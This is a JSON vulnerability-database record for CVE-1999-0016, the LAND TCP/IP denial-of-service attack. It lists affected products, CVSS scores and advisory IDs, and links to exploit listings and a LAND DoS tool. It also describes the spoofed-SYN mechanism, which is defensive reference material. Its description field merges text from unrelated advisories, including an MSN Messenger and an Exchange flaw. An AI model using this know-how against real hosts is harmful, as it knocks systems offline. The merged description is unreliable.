      {
        "model": "ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.2.4"
      },
      {
        "model": "ios a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.3.19"
      },
      {
        "model": "ios f1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.2.4"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.35"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "11.0"
      },
      {
        "model": "windows xp home",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "cmw+",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sco",
        "version": "3.0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.2"
      },
      {
        "model": "bsd/os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bsdi",
        "version": "4.0"
      },
      {
        "model": "windows server web edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.1"
      },
      {
        "model": "ios ca",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.1.15"
      },
      {
        "model": "windows xp media center edition sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios/700",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.30"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.1"
      },
      {
        "model": "windows nt server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "95"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.2.10"
      },
      {
        "model": "catalyst supervisor software",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "29xx2.4.401"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.37"
      },
      {
        "model": "sunos u1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sun",
        "version": "4.1.3"
      },
      {
        "model": "windows nt sp4",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "3.5.1"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.0"
      },
      {
        "model": "atm switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "marconi",
        "version": "6.1.1"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.32"
      },
      {
        "model": "windows nt server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt terminal server sp4",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows xp professional sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows xp home sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "catalyst supervisor software",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "29xx2.1.1102"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netbsd",
        "version": "1.2.1"
      },
      {
        "model": "windows xp 64-bit edition sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "open server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sco",
        "version": "5.0"
      },
      {
        "model": "windows xp 64-bit edition version sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "freebsd",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.2.8"
      },
      {
        "model": "windows nt workstation sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "ios p",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.2.9"
      },
      {
        "model": "atm switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "marconi",
        "version": "7.0.1"
      },
      {
        "model": "windows nt sp6",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows server datacenter edition sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.2.4"
      },
      {
        "model": "windows nt server sp4",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows nt server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.1.15"
      },
      {
        "model": "windows server enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.1.6"
      },
      {
        "model": "bsd/os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bsdi",
        "version": "4.0.1"
      },
      {
        "model": "windows xp 64-bit edition version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "ios ca",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.1.7"
      },
      {
        "model": "windows server datacenter edition itanium sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netbsd",
        "version": "1.2"
      },
      {
        "model": "windows nt terminal server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.1x"
      },
      {
        "model": "windows server web edition sp1 beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20031"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#774338"
      },
      {
        "db": "CERT/CC",
        "id": "VU#756122"
      },
      {
        "db": "CERT/CC",
        "id": "VU#222050"
      },
      {
        "db": "CERT/CC",
        "id": "VU#633446"
      },
      {
        "db": "CERT/CC",
        "id": "VU#396645"
      },
      {
        "db": "CERT/CC",
        "id": "VU#233754"
      },
      {
        "db": "CERT/CC",
        "id": "VU#275193"
      },
      {
        "db": "BID",
        "id": "2666"
      },
      {
        "db": "NVD",
        "id": "CVE-1999-0016"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-199712-002"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ios:7000:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:gnu:inet:5.01:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:microsoft:winsock:2.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:hp:hp-ux:9.04:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:hp:hp-ux:9.05:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:hp:hp-ux:9.07:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_95:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:hp:hp-ux:10.16:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:hp:hp-ux:10.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:hp:hp-ux:10.24:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:hp:hp-ux:10.30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:hp:hp-ux:10.01:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:hp:hp-ux:9.00:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:hp:hp-ux:9.03:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows_nt:4.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:sun:sunos:4.1.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:hp:hp-ux:10.00:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:hp:hp-ux:10.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:hp:hp-ux:11.00:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:hp:hp-ux:9.01:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:netbsd:netbsd:1.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:sun:sunos:4.1.3u1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-1999-0016"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "m3lt meltman@lagged.net",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-199712-002"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-1999-0016",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-16",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULMON",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CVE-1999-0016",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "MEDIUM",
            "trust": 0.1,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-1999-0016",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#774338",
            "trust": 0.8,
            "value": "21.80"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#756122",
            "trust": 0.8,
            "value": "21.80"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#222050",
            "trust": 0.8,
            "value": "4.36"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#633446",
            "trust": 0.8,
            "value": "23.63"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#396645",
            "trust": 0.8,
            "value": "12.15"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#233754",
            "trust": 0.8,
            "value": "12.29"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#275193",
            "trust": 0.8,
            "value": "36.15"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-199712-002",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-16",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-1999-0016",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#774338"
      },
      {
        "db": "CERT/CC",
        "id": "VU#756122"
      },
      {
        "db": "CERT/CC",
        "id": "VU#222050"
      },
      {
        "db": "CERT/CC",
        "id": "VU#633446"
      },
      {
        "db": "CERT/CC",
        "id": "VU#396645"
      },
      {
        "db": "CERT/CC",
        "id": "VU#233754"
      },
      {
        "db": "CERT/CC",
        "id": "VU#275193"
      },
      {
        "db": "VULHUB",
        "id": "VHN-16"
      },
      {
        "db": "VULMON",
        "id": "CVE-1999-0016"
      },
      {
        "db": "NVD",
        "id": "CVE-1999-0016"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-199712-002"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Land IP denial of service. MSN Messenger clients before version 7.0 will allow remote attackers to take control of a computer if malicious GIF files are processed. Microsoft Windows does not adequately validate IP options, allowing an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service.  An attacker could take complete control of a vulnerable system. A number of TCP/IP stacks are vulnerable to a \"loopback\" condition initiated by sending a TCP SYN packet with the  source address and port spoofed to equal the destination source and port.  When a packet of this sort is received, an infinite loop is  initiated and the affected system halts.  This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices \u0026amp; Catalyst switches, and HP-UX up to 11.00. \nIt is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue. \n**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. The TCP/IP network protocol stack is the most widely used network protocol for Internet networking implemented by most operating systems. There are loopholes in the TCP/IP protocol stack implementation of early BSD-derived systems (except Linux) and Windows systems, and remote attackers can use this loophole to carry out denial-of-service attacks on the server. Due to problems in the implementation of TCP/IP, the target system may have problems processing such malformed packets. Many old versions of UNIX-like operating systems will crash, and NT\u0027s CPU resource usage will be close to 100\\\\% (for about five minutes). \n\nThe vulnerability is caused due to improper handling of IP packets\nwith the same destination and source IP and the SYN flag set. This\ncauses a system to consume all available CPU resources for a certain\nperiod of time. \n\nThis kind of attack was first reported in 1997 and became known as\nLAND attacks. \n\nSOLUTION:\nFilter traffic with the same IP address as source and destination\naddress at the perimeter. \n\nThe vulnerability is caused due to a boundary error in the SMTP\nservice within the handling of a certain extended verb request. This\ncan be exploited to cause a heap-based buffer overflow by connecting\nto the SMTP service and issuing a specially crafted command. Instead, this requires permissions\nusually only granted to other Exchange servers in a domain. \n\nMicrosoft Exchange 2000 Server (requires SP3):\nhttp://www.microsoft.com/downloads/details.aspx?FamilyId=2A2AF17E-2E4A-4479-8AC9-B5544EA0BD66\n\nMicrosoft Exchange Server 2003:\nhttp://www.microsoft.com/downloads/details.aspx?FamilyId=97F409EB-C8D0-4C94-A67B-5945E26C9267\n\nMicrosoft Exchange Server 2003 (requires SP1):\nhttp://www.microsoft.com/downloads/details.aspx?FamilyId=35BCE74A-E84A-4035-BF18-196368F032CC\n\nThe following versions are not affected:\n* Microsoft Exchange Server 5.5 SP4\n* Microsoft Exchange Server 5.0 SP2\n\nPROVIDED AND/OR DISCOVERED BY:\nMark Dowd and Ben Layer, ISS X-Force. \n\nORIGINAL ADVISORY:\nMS05-021 (KB894549):\nhttp://www.microsoft.com/technet/security/Bulletin/MS05-021.mspx\n\nISS X-Force:\nhttp://xforce.iss.net/xforce/alerts/id/193\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n                      National Cyber Alert System \n\n              Technical Cyber Security Alert TA05-102A \n\nMultiple Vulnerabilities in Microsoft Windows Components\n\n   Original release date: April 12, 2005\n   Last revised: --\n   Source: US-CERT\n\n\nSystems Affected\n\n     * Microsoft Windows Systems\n\n   For a complete list of affected versions of the Windows operating\n   systems and components, refer to the Microsoft Security Bulletins. \n\n\nOverview\n\n   Microsoft has released a Security Bulletin Summary for April, 2005. \n   This summary includes several bulletins that address\n   vulnerabilities in various Windows applications and\n   components. Details of\n   the vulnerabilities and their impacts are provided below. \n\n\nI. Description\n\n   The list below provides a mapping between Microsoft\u0027s Security\n   Bulletins and the related US-CERT Vulnerability Notes. More\n   information related to the vulnerabilities is available in these\n   documents. \n\n\nIII. Solution\n\nApply a patch\n\n   Microsoft has provided the patches for these vulnerabilities in the\n   Security Bulletins and on Windows Update. \n\n\nAppendix A. References\n\n     * Microsoft\u0027s Security Bulletin Summary for April, 2005 - \u003c\n       http://www.microsoft.com/technet/security/bulletin/ms05-apr.mspx\u003e\n\n     * US-CERT Vulnerability Note VU#774338 -\n       \u003chttp://www.kb.cert.org/vuls/id/774338\u003e\n\n     * US-CERT Vulnerability Note VU#756122 -\n       \u003chttp://www.kb.cert.org/vuls/id/756122\u003e\n\n     * US-CERT Vulnerability Note VU#222050 -\n       \u003chttp://www.kb.cert.org/vuls/id/222050\u003e\n\n     * US-CERT Vulnerability Note VU#275193 -\n       \u003chttp://www.kb.cert.org/vuls/id/275193\u003e\n\n     * US-CERT Vulnerability Note VU#633446 -\n       \u003chttp://www.kb.cert.org/vuls/id/633446\u003e\n\n     * US-CERT Vulnerability Note VU#233754 -\n       \u003chttp://www.kb.cert.org/vuls/id/233754\u003e\n   _________________________________________________________________\n\n   Feedback can be directed to the authors: Will Dormann, Jeff Gennari,\n   Chad Dougherty, Ken MacInnis, Jason Rafail, Art Manion, and Jeff\n   Havrilla. \n   _________________________________________________________________\n\n    This document is available from: \n   \n      \u003chttp://www.us-cert.gov/cas/techalerts/TA05-102A.html\u003e      \n   \n   _________________________________________________________________\n\n   Copyright 2005 Carnegie Mellon University. \n   \n   Terms of use: \u003chttp://www.us-cert.gov/legal.html\u003e\n   _________________________________________________________________\n\n   Revision History\n\n   April 12, 2005: Initial release\n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.1 (GNU/Linux)\n\niQEVAwUBQlxwexhoSezw4YfQAQJ4RAf/bTgaa6SBDMJveqW/GnQET79F9aVPM1S2\nglam1w4YFyOdyIHpDYqQZRBqgXgpJjel/MiH02tZreU5mgIjkPIWA3gleepyWvnN\n7VYv8KcbSnyvGxDl/8K2YjFz550gxA3pkRD7IiqdpOums87lJ7xM7sjdUY0ZA8aF\nJEvA4gfndpgLSuISV7Gf8y1s4MU329DurNy3t8W4EB9Iuef/E4Z058IvHnz9dTnT\nXwBnyW1KfH2Ohpy7QBOtcXt1wXU8X0F+d01g/VZmTL7xVwXmcPi8UpS7bPK8A17+\nasqo582KjZVR56iL7fqNQzsrXUGZncEnX/8QOhi3Ym2LfAEkKrg3rw==\n=BY/p\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-1999-0016"
      },
      {
        "db": "CERT/CC",
        "id": "VU#774338"
      },
      {
        "db": "CERT/CC",
        "id": "VU#756122"
      },
      {
        "db": "CERT/CC",
        "id": "VU#222050"
      },
      {
        "db": "CERT/CC",
        "id": "VU#633446"
      },
      {
        "db": "CERT/CC",
        "id": "VU#396645"
      },
      {
        "db": "CERT/CC",
        "id": "VU#233754"
      },
      {
        "db": "CERT/CC",
        "id": "VU#275193"
      },
      {
        "db": "BID",
        "id": "2666"
      },
      {
        "db": "VULHUB",
        "id": "VHN-16"
      },
      {
        "db": "VULMON",
        "id": "CVE-1999-0016"
      },
      {
        "db": "PACKETSTORM",
        "id": "36523"
      },
      {
        "db": "PACKETSTORM",
        "id": "37141"
      },
      {
        "db": "PACKETSTORM",
        "id": "37198"
      }
    ],
    "trust": 6.66
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=20812",
        "trust": 0.5,
        "type": "exploit"
      },
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-16",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-16"
      },
      {
        "db": "VULMON",
        "id": "CVE-1999-0016"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-1999-0016",
        "trust": 2.1
      },
      {
        "db": "SECUNIA",
        "id": "14512",
        "trust": 1.7
      },
      {
        "db": "BID",
        "id": "2666",
        "trust": 1.1
      },
      {
        "db": "CERT/CC",
        "id": "VU#774338",
        "trust": 0.9
      },
      {
        "db": "CERT/CC",
        "id": "VU#756122",
        "trust": 0.9
      },
      {
        "db": "CERT/CC",
        "id": "VU#222050",
        "trust": 0.9
      },
      {
        "db": "CERT/CC",
        "id": "VU#633446",
        "trust": 0.9
      },
      {
        "db": "CERT/CC",
        "id": "VU#233754",
        "trust": 0.9
      },
      {
        "db": "SECUNIA",
        "id": "14920",
        "trust": 0.9
      },
      {
        "db": "USCERT",
        "id": "TA05-102A",
        "trust": 0.9
      },
      {
        "db": "CERT/CC",
        "id": "VU#275193",
        "trust": 0.9
      },
      {
        "db": "OSVDB",
        "id": "14578",
        "trust": 0.8
      },
      {
        "db": "XF",
        "id": "19593",
        "trust": 0.8
      },
      {
        "db": "CERT/CC",
        "id": "VU#396645",
        "trust": 0.8
      },
      {
        "db": "BID",
        "id": "13116",
        "trust": 0.8
      },
      {
        "db": "SECTRACK",
        "id": "1013686",
        "trust": 0.8
      },
      {
        "db": "OSVDB",
        "id": "15467",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-199712-002",
        "trust": 0.7
      },
      {
        "db": "HP",
        "id": "HPSBUX9801-076",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "20812",
        "trust": 0.2
      },
      {
        "db": "EXPLOIT-DB",
        "id": "20810",
        "trust": 0.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "20814",
        "trust": 0.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "20813",
        "trust": 0.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "20811",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-16",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-1999-0016",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "36523",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "37141",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "37198",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#774338"
      },
      {
        "db": "CERT/CC",
        "id": "VU#756122"
      },
      {
        "db": "CERT/CC",
        "id": "VU#222050"
      },
      {
        "db": "CERT/CC",
        "id": "VU#633446"
      },
      {
        "db": "CERT/CC",
        "id": "VU#396645"
      },
      {
        "db": "CERT/CC",
        "id": "VU#233754"
      },
      {
        "db": "CERT/CC",
        "id": "VU#275193"
      },
      {
        "db": "VULHUB",
        "id": "VHN-16"
      },
      {
        "db": "VULMON",
        "id": "CVE-1999-0016"
      },
      {
        "db": "BID",
        "id": "2666"
      },
      {
        "db": "PACKETSTORM",
        "id": "36523"
      },
      {
        "db": "PACKETSTORM",
        "id": "37141"
      },
      {
        "db": "PACKETSTORM",
        "id": "37198"
      },
      {
        "db": "NVD",
        "id": "CVE-1999-0016"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-199712-002"
      }
    ]
  },
  "id": "VAR-199712-0007",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-16"
      }
    ],
    "trust": 0.43667661
  },
  "last_update_date": "2023-12-18T11:45:22.618000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "CVE-1999-0016-Land-DOS-tool",
        "trust": 0.1,
        "url": "https://github.com/pexmee/cve-1999-0016-land-dos-tool "
      },
      {
        "title": "opensims",
